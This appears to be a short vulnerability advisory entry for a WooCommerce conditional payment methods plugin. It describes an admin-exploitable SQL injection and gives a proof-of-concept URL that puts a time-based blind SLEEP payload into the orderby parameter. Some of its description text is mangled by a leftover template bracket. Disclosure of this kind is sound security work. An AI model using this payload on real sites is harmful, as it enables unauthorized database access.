EPSS
Percentile
44.8%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by [high privilege users such as admin|users with a role as low as admin.
https://example.com/wp-admin/admin.php?page=wcpma-payment-settings&action;=wcpma_view_list&orderby;=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)
bulletin.iese.de/post/conditional-payment-methods-for-woocommerce_1-0/